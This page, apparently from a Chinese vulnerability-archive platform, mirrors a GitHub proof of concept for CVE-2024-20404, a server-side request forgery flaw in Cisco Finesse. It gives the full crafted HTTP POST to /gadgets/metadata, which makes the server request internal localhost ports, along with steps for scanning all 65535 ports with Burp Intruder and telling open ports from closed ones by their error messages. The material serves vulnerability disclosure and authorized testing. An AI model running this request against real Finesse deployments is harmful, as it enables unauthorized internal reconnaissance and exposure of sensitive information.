漏洞平台

POC详情： 0e83cf1f06363fa0801280a548aded51e65ae9dc

来源

https://github.com/3zz4t/CVE-2024-20404

关联漏洞

标题： Cisco Finesse 代码问题漏洞 (CVE-2024-20404)
描述：Cisco Finesse是美国思科（Cisco）公司的一套呼叫中心管理软件。 Cisco Finesse 存在代码问题漏洞，该漏洞源于对发送到受影响系统的特定 HTTP 请求的用户输入验证不足。

介绍

## Description

A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct an SSRF attack on an affected system.

This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are sent to an affected system. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to obtain limited sensitive information for services that are associated to the affected device.



## Proof of Concept (PoC)

1. Send the below request to check the response from the port number "8444" on the localhost of the server after replacing the `<target>` of yours.

```HTTP
POST /gadgets/metadata HTTP/2
Host: <target>:8445
Cookie: timeBeforeFailover=1695808242310; timeBeforeAttemptingLoginInIframe=1695808244317; attemptsMade=1; seqNumberGenerated=1; finesse_ag_extension=<extension>; activeDeviceId4000=SEPD4AD717A03F6; timeBeforeLoadingOtherSide=1695808249678
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<target>:8445/desktop/container;jsessionid=90aE172355707490406528141464742B/?locale=en_US
Content-Type: application/json
Content-Length: 127
Origin: https://<target>:8445
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"context":{"container":"default","language":"en","country":"US","locale":"en_US"},"gadgets":[{"url":"http://127.0.0.1:8444"}]}
```

![](screenshots/Pasted%20image%2020240609205940.png)

2. Use the burp suite intruder to scan all the open ports on the Cisco Finesse web-based management server, by changing the port number from 1-65535.

3. You will see the response "Connection refused" on the closed ports.

![](screenshots/Pasted%20image%2020240609210322.png)

4. The other error messages indicate that these ports are open, and they can be enumerated.

![](screenshots/Pasted%20image%2020240609210501.png)



## References

- [https://nvd.nist.gov/vuln/detail/CVE-2024-20404](https://nvd.nist.gov/vuln/detail/CVE-2024-20404)
- [https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-finesse-ssrf-rfi-Um7wT8Ew](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-finesse-ssrf-rfi-Um7wT8Ew)



## Disclaimer

This is just a Proof of Concept (PoC) to demonstrate that the Cisco Finesse web-based management interface is vulnerable to Server Side Request Forgery (SSRF), and this PoC is for educational purposes only. Use it responsibly and only on systems with explicit permission to test. Misuse of this PoC can result in severe consequences.

文件快照


 [4.0K]  /data/pocs/0e83cf1f06363fa0801280a548aded51e65ae9dc
├── [2.8K]  README.md
└── [4.0K]  screenshots
    ├── [ 43K]  Pasted image 20240609205940.png
    ├── [358K]  Pasted image 20240609210322.png
    └── [389K]  Pasted image 20240609210501.png

1 directory, 4 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。